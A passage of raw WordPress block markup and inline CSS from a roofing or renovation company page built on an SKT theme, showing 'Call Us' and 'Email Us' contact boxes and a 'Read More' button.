.block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7840f5f3-0744-458f-9ff2-16549137981d .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7840f5f3-0744-458f-9ff2-16549137981d\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"65659e02-d7c8-4601-8298-92cc76359ea6\"} -->\n<style type=\"text/css\"> .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-65659e02-d7c8-4601-8298-92cc76359ea6 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000 </p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"0521c096-f2f6-411e-ad36-b722f208852d\"} -->\n<style type=\"text/css\"> .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0521c096-f2f6-411e-ad36-b722f208852d .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0521c096-f2f6-411e-ad36-b722f208852d\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"b774f8a6-033a-4077-80ee-f0b2f30b0428\"} -->\n<style type=\"text/css\"> .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-b774f8a6-033a-4077-80ee-f0b2f30b0428 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/about/\",\"target\":false,\"counterId\":\"9c9da01d-f799-4178-ae4b-9714df123864\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-9c9da01d-f799-4178-ae4b-9714df123864 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/about/\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"30f90495-ee55-4579-800d-d587d050d2fa\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-30f90495-ee55-4579-800d-d587d050d2fa background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-30f90495-ee55-4579-800d-d587d050d2fa.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-30f90495-ee55-4579-800d-d587d050d2fa .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-30f90495-ee55-4579-800d-d587d050d2fa.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"e581b9d6-7409-4b90-bcaf-3c205e32317a\"} -->\n<style type=\"text/css\"> .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e581b9d6-7409-4b90-bcaf-3c205e32317a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-e581b9d6-7409-4b90-bcaf-3c205e32317a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb\"} -->\n<style type=\"text/css\"> .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a0a2064-d094-4cd9-a9d2-c2fc78d26eeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 15px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: 